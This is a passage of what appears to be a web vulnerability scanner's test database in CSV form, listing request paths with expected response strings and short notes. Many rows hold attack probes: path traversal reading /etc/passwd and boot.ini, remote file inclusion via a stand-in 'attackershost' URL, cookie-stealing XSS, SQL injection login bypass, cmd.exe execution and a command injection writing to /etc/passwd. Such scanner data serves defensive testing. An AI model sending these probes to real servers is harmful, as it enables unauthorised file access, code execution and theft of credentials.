"002461","3093","1","/forum_professionnel.asp?n=/....../boot.ini|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.","GET","boot load","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002462","3093","1","/forum_professionnel.asp?n=/.../.../.../.../.../.../boot.ini|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.","GET","boot load","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002463","3093","1","/forum_professionnel.asp?n=/../../../../../../../../../../../../../../../../../../../../boot.ini|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.","GET","boot load","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002464","3093","1","/forum_professionnel.asp?n=/../../../../../../../../etc/passwd|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.","GET","root:","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002465","3093","1","/forum_professionnel.asp?n=/.\"./.\"./.\"./.\"./.\"./boot.ini|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.","GET","boot load","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002466","3093","1","/forum_professionnel.asp?n=/etc/passwd%00|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.","GET","root:","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002467","3093","1","/forum_professionnel.asp?n=/etc/passwd|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.","GET","root:","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002468","3093","1","/forum_professionnel.asp?n=100","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002469","3093","1","/forum_professionnel.asp?n=c:\boot.ini|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;c:&#039;.","GET","boot load","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002470","3093","1","/functions.inc.php+","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002471","10447","3","/get_od_toc.pl?Profile=","GET","PROGRA~1","200","","","","WebTrends get_od_toc.pl may be vulnerable to a path disclosure error if this file is reloaded multiple times.","",""
"002472","3093","1","/globals.php3","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002473","3093","1","/globals.pl","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002474","6656","6","/Gozila.cgi","GET","200","","","","","Linksys BEF Series routers are vulnerable to multiple DoS attacks in Gozila.cgi.","",""
"002475","1963","c","/helperfunction.php?includedir=@RFIURL","GET","PHP Version","","","","","phpAdsNew or SIPS helperfunction.php maybe vulnerable to remote file inclusion.","",""
"002476","3093","1","/homebet/homebet.dll?form=menu&amp;option=menu-signin","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002477","27908","c","/htmltonuke.php?filnavn=@RFIURL","GET","PHP Version","","","","","HTMLtoNuke filnavn variable allows remote file inclusion.","",""
"002478","3093","1","/idealbb/error.asp?|-|0|404_Object_Not_Found","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002479","3093","1","/iisprotect/admin/SiteAdmin.ASP?|-|0|404_Object_Not_Found","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002480","3093","1","/imprimer.asp?no=%60/etc/passwd%60|44|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;`&#039;.","GET","root:","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002481","3093","1","/imprimer.asp?no=....//....//....//....//....//....//....//etc.passwd|44|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.","GET","root:","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002482","3093","1","/imprimer.asp?no=../../../../../../../../../etc/passwd%00|44|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.","GET","root:","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002483","3093","1","/imprimer.asp?no=/....../boot.ini|44|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.","GET","boot load","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002484","3093","1","/imprimer.asp?no=/.../.../.../.../.../.../boot.ini|44|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.","GET","boot load","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002485","3093","1","/imprimer.asp?no=/../../../../../../../../../../../../../../../../../../../../boot.ini|44|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.","GET","boot load","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002486","3093","1","/imprimer.asp?no=/../../../../../../../../etc/passwd|44|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.","GET","root:","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002487","3093","1","/imprimer.asp?no=/.\"./.\"./.\"./.\"./.\"./boot.ini|44|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.","GET","boot load","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002488","3093","1","/imprimer.asp?no=/etc/passwd%00|44|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.","GET","root:","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002489","3093","1","/imprimer.asp?no=/etc/passwd|44|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.","GET","root:","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002490","3093","1","/imprimer.asp?no=c:\boot.ini|44|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;c:&#039;.","GET","boot load","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002491","3093","1","/include/customize.php","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002492","3093","1","/include/help.php","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002493","3093","1","/includes/footer.php3","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002494","3093","1","/includes/header.php3","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002500","3093","1","/index.php?topic=&amp;lt;script&amp;gt;alert(document.cookie)&amp;lt;/script&amp;gt;%20","GET","alert\\\(document\.cookie\\\)","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002501","3093","1","/infos/contact/index.asp","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002502","3093","1","/infos/faq/index.asp","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002503","3093","1","/infos/gen/index.asp","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002504","3093","1","/infos/services/index.asp","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002505","3093","1","/instaboard/index.cfm","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002506","3093","1","/intranet/browse.php","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002507","3093","1","/invitefriends.php3","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002508","3093","1","/ipchat.php","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002509","3093","1","/ixmail_netattach.php","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002510","3093","1","/jsptest.jsp+","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002511","3093","1","/kernel/class/delete.php","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002512","3093","1","/kernel/classes/ezrole.php","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002513","3093","1","/ldap.search.php3?ldap_serv=nonsense%20","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002514","3093","1","/livredor/index.php","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002515","3093","1","/login.php3?reason=chpass2%20","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002516","3093","1","/mail/include.html","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002517","3093","1","/mail/settings.html","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002518","3093","1","/mail/src/read_body.php","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002519","3093","1","/mailview.cgi?cmd=view&amp;fldrname=inbox&amp;select=1&amp;html=../../../../../../etc/passwd","GET","root:","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002520","3093","1","/mambo/banners.php","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002521","3093","1","/manage/login.asp+","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002522","3093","1","/mantis/summary_graph_functions.php?g_jpgraph_path=http%3A%2F%2Fattackershost%2Flistings.txt%3F","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002523","3093","1","/members/ID.pm","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002524","3093","1","/members/ID.xbb","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002525","3093","1","/mod.php","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002526","3093","1","/modif/delete.php","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002527","3093","1","/modif/ident.php","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002528","3093","1","/modif_infos.asp?n=%60/etc/passwd%60","GET","root:","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002529","3093","1","/modif_infos.asp?n=....//....//....//....//....//....//....//etc.passwd","GET","root:","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002530","3093","1","/modif_infos.asp?n=../../../../../../../../../etc/passwd%00","GET","root:","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002531","3093","1","/modif_infos.asp?n=/....../boot.ini","GET","boot load","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002532","3093","1","/modif_infos.asp?n=/.../.../.../.../.../.../boot.ini","GET","boot load","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002533","3093","1","/modif_infos.asp?n=/../../../../../../../../../../../../../../../../../../../../boot.ini","GET","boot load","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002534","3093","1","/modif_infos.asp?n=/../../../../../../../../../etc/passwd","GET","root:","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002535","3093","1","/modif_infos.asp?n=/.\"./.\"./.\"./.\"./.\"./boot.ini","GET","boot load","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002536","3093","1","/modif_infos.asp?n=/etc/passwd","GET","root:","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002537","3093","1","/modif_infos.asp?n=/etc/passwd%00","GET","root:","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002538","3093","1","/modif_infos.asp?n=c:\boot.ini","GET","boot load","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002539","3093","1","/modules/Downloads/voteinclude.php+","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002540","3093","1","/modules/Forums/attachment.php","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002541","3093","1","/modules/Search/index.php","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002542","3093","1","/modules/WebChat/in.php+","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002543","3093","1","/modules/WebChat/out.php","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002544","3093","1","/modules/WebChat/quit.php","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002545","3093","1","/modules/WebChat/users.php","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002546","3093","1","/modules/Your_Account/navbar.php+","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002547","3093","1","/moregroupware/modules/webmail2/inc/","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002548","3093","1","/msadc/Samples/SELECTOR/showcode.asp?|-|0|404_Object_Not_Found","GET","200","","","Access Denied","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002549","3093","1","/myguestBk/add1.asp?|-|0|404_Object_Not_Found","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002550","3093","1","/myguestBk/admin/delEnt.asp?id=NEWSNUMBER|-|0|404_Object_Not_Found","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002551","3093","1","/myguestBk/admin/index.asp?|-|0|404_Object_Not_Found","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002552","3093","1","/netget?sid=Safety&amp;msg=2002&amp;file=Safety","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002553","3093","1","/newtopic.php","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002554","3093","1","/nphp/nphpd.php","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002555","3093","1","/OpenTopic","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002556","3093","1","/options.inc.php+","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002557","3093","1","/oscommerce/default.php","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002558","3093","1","/parse_xml.cgi","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002559","3093","1","/php/gaestebuch/admin/index.php","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002560","3093","1","/php/php4ts.dll","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002561","3093","1","/pks/lookup","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002562","3093","1","/pm/lib.inc.php","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002563","3093","1","/poppassd.php3+","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002564","3093","1","/produccart/pdacmin/login.asp?|-|0|404_Object_Not_Found","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002565","3093","1","/productcart/database/EIPC.mdb","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002566","3093","1","/productcart/pc/Custva.asp?|-|0|404_Object_Not_Found","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002567","3093","1","/ProductCart/pc/msg.asp?|-|0|404_Object_Not_Found","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002568","3093","1","/product_info.php","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002569","3093","1","/prometheus-all/index.php","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002571","3093","1","/protected/","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002572","3093","1","/protected/secret.html+","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002573","3093","1","/protectedpage.php?uid=&#039;%20OR%20&#039;&#039;=&#039;&amp;pwd=&#039;%20OR%20&#039;&#039;=&#039;","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002574","3093","1","/protection.php","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002575","3093","1","/pt_config.inc","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002576","3093","1","/pvote/add.php?question=AmIgAy&amp;o1=yes&amp;o2=yeah&amp;o3=well..yeah&amp;o4=bad%20","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002577","3093","1","/pvote/del.php?pollorder=1%20","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002578","3093","1","/quikmail/nph-emumail.cgi?type=../%00","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002579","3093","1","/room/save_item.php","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002580","3093","1","/rubrique.asp?no=%60/etc/passwd%60|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;`&#039;.","GET","root:","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002581","3093","1","/rubrique.asp?no=....//....//....//....//....//....//....//etc.passwd|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.","GET","root:","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002582","3093","1","/rubrique.asp?no=../../../../../../../../../etc/passwd%00|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.","GET","root:","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002583","3093","1","/rubrique.asp?no=/....../boot.ini|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.","GET","boot load","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002584","3093","1","/rubrique.asp?no=/.../.../.../.../.../.../boot.ini|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.","GET","boot load","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002585","3093","1","/rubrique.asp?no=/../../../../../../../../../../../../../../../../../../../../boot.ini|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.","GET","boot load","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002586","3093","1","/rubrique.asp?no=/../../../../../../etc/passwd|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.","GET","root:","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002587","3093","1","/rubrique.asp?no=/../../../etc/passwd|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.","GET","root:","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002588","3093","1","/rubrique.asp?no=/.\"./.\"./.\"./.\"./.\"./boot.ini|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.","GET","boot load","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002589","3093","1","/rubrique.asp?no=/etc/passwd%00|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.","GET","root:","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002590","3093","1","/rubrique.asp?no=/etc/passwd|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.","GET","root:","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002591","3093","1","/rubrique.asp?no=c:\boot.ini|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;c:&#039;.","GET","boot load","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002592","3093","1","/screen.php","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002593","3093","1","/scripts/tradecli.dll","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002594","3093","1","/scripts/tradecli.dll?template=nonexistfile?template=..\..\..\..\..\winnt\system32\cmd.exe?/c+dir","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002595","3093","1","/security/web_access.html","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002596","3093","1","/sendphoto.php","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002597","3093","1","/servers/link.cgi","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002598","3093","1","/setpasswd.cgi","GET","root:","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002599","3093","1","/shop/php_files/site.config.php+","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002600","3093","1","/shop/search.php","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002601","3093","1","/shop/show.php","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002602","3093","1","/shoutbox/expanded.php?conf=../../../../../../../etc/passwd%20","GET","root:","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002603","3093","1","/Site/biztalkhttpreceive.dll","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002604","3093","1","/site_searcher.cgi","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002605","3093","1","/spelling.php3+","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002606","3093","1","/squirrelmail/src/read_body.php","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002607","3093","1","/staticpages/index.php","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002608","3093","1","/status.php3","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002609","3093","1","/supporter/index.php","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002610","3093","1","/supporter/tupdate.php","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002611","3093","1","/sw000.asp?|-|0|404_Object_Not_Found","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002612","3093","1","/syslog.htm?%20","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002613","3093","1","/technote/print.cgi","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002614","3093","1","/texis/websearch/phine","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002615","3093","1","/tinymsg.php","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002616","3093","1","/tmp_view.php?file=/etc/passwd","GET","root:","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002617","3093","1","/topic/entete.php","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002618","3093","1","/topsitesdir/edit.php","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002619","3093","1","/ttforum/index.php","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002620","3093","1","/tutos/file/file_new.php","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002621","3093","1","/tutos/file/file_select.php","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002622","3093","1","/typo3/typo3/dev/translations.php","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002623","3093","1","/uifc/MultFileUploadHandler.php+","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002624","3093","1","/url.jsp","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002625","3093","1","/useraction.php3","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002626","3093","1","/userreg.cgi?cmd=insert&amp;lang=eng&amp;tnum=3&amp;fld1=test999%0acat&lt;/var/spool/mail/login&gt;&gt;/etc/passwd","GET","root:","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002627","3093","1","/utils/sprc.asp+","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002628","3093","1","/vars.inc+","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002629","3093","1","/VBZooM/add-subject.php","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002630","3093","1","/wbboard/profile.php","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002631","3093","1","/wbboard/reply.php","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002632","3093","1","/webcalendar/login.php","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002633","3093","1","/webcalendar/view_m.php","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002634","3093","1","/webmail/lib/emailreader_execute_on_each_page.inc.php","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002635","3093","1","/webmail/src/read_body.php","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002636","3093","1","/web_app/WEB-INF/webapp.properties","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002637","3093","1","/XMBforum/buddy.php","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002638","3093","1","/XMBforum/member.php","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002639","3093","1","/x_stat_admin.php","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002640","3093","1","/yabbse/Reminder.php","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002641","3093","1","/yabbse/Sources/Packages.php","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002642","3093","1","/zentrack/index.php","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002643","3093","1","/_head.php","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002644","3093","1","@CGIDIRSadduser.cgi","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002645","3093","1","@CGIDIRSamadmin.pl","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002646","3093","1","@CGIDIRSanyboard.cgi","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002647","3093","1","@CGIDIRSAT-generate.cgi","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002648","3093","1","@CGIDIRSauctiondeluxe/auction.pl","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002649","3093","1","@CGIDIRSawl/auctionweaver.pl","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002650","3093","1","@CGIDIRSbb-ack.sh","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002651","3093","1","@CGIDIRSbb-histlog.sh","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002652","3093","1","@CGIDIRSbb-rep.sh","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002653","3093","1","@CGIDIRSbb-replog.sh","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002654","3093","1","@CGIDIRSbbs_forum.cgi","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002655","3093","1","@CGIDIRSbuild.cgi","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002656","3093","1","@CGIDIRSbulk/bulk.cgi","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002657","3093","1","@CGIDIRScached_feed.cgi","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002658","3093","1","@CGIDIRScalender_admin.pl","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002659","3093","1","@CGIDIRScartmanager.cgi","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002660","3093","1","@CGIDIRScbmc/forums.cgi","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002661","3093","1","@CGIDIRScgforum.cgi","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002662","3093","1","@CGIDIRSchange-your-password.pl","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
"002663","3093","1","@CGIDIRSclickresponder.pl","GET","200","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","",""
